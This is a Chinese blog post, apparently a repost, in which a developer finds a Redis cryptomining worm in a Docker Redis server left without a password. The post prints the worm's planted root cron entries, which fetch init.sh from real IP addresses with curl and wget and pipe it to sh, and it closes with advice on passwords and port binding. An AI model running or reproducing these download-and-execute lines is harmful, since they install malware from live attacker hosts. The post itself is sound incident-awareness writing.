事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒

安全 应用安全
查了下发现这是一种 Redis 扩散病毒,专门利用 Redis 未授权访问漏洞的挖矿病毒。没错,就是 Redis 没设置密码,没授权,让病毒有了可乘之机。

前段时间换了台电脑,一大堆开发环境我实在是懒得在本地搞了,每次启动来启动去太麻烦了,索性直接在服务器上开 Docker 部署,docker pull 复制粘贴什么 Redis、什么 MySQL 分分钟装好,要用的时候直接远程连接就行了,简直不要太方便。

也不是什么业务场景让我发现了这么一个病毒,因为大部分 Redis Key 都是设置了过期时间的,开发过程也没感觉到什么问题,纯粹是有一天我闲着没事干,进入 Redis 命令行 keys * 看看,不看不要紧,一看好家伙,多出了几个 key,大概就是下面这样子:

uid:1
uid:2
uid:3
backup1
backup2
backup3
backup4

多出了 4 个 backup 前缀的 key,我第一反应这肯定是什么备份文件

正常情况下我根本不会在意,纯粹就是那天确实比较闲,不如来学习下 Redis 吧(哈哈),于是,禀着好学的基本素养,我分别查看了下这里面的 value 是什么:

*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh

*/3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh

*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh

*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh

wget 是用来下载东西的,curl 是用于执行 HTTP 请求,点开 http://45.83.123.29/cleanfda/init.sh 看看到底是什么脚本文件:

图片

又是改权限,又是关防火墙删文件的,用屁股想都知道这 IP 肯定是国外的了:

图片

查了下发现这是一种 Redis 扩散病毒,专门利用 Redis 未授权访问漏洞的挖矿病毒。没错,就是 Redis 没设置密码,没授权,让病毒有了可乘之机。如果服务暴露在互联网上就一定要设置密码,不要裸奔 😭,很多同学大部分时间都是在本地开发,没有设置密码的习惯或者只是简单的设置成 root 这种

另外,除了设置密码,服务器开放端口的时候最好也指定下 IP,不然默认的 0.0.0.0:6379 任何 IP 都可以访问

责任编辑:武晓燕 来源: 飞天小牛肉
相关推荐

2014-01-09 09:34:07

Linux

2021-11-24 07:25:47

ESClickHouse存储

2022-05-17 23:44:25

大数据工具样本分析师

2021-08-23 07:42:57

Windows 10操作系统微软

2017-12-27 14:15:47

大数据数据分析圣诞

2014-06-12 08:58:13

阿里巴巴王坚云计算

2019-05-25 11:19:03

华为开发者存储

2022-03-15 14:53:30

安全隐私信息泄露

2024-06-04 14:08:00

2013-03-04 16:45:49

2013-01-30 09:16:39

云标准云服务

2013-07-29 09:53:57

医疗马云阿里

2016-10-11 13:44:23

实时通信互联网

2020-10-23 10:12:30

物联网互联网技术

2010-09-10 14:14:55

群发邮件蠕虫病毒

2011-08-19 11:33:32

2015-06-24 15:35:54

2018-01-31 09:25:39

2020-03-03 15:45:08

互联网求职行业从业者

2017-03-13 09:00:44

互联网金融第三方支付P2P
点赞
收藏

51CTO技术栈公众号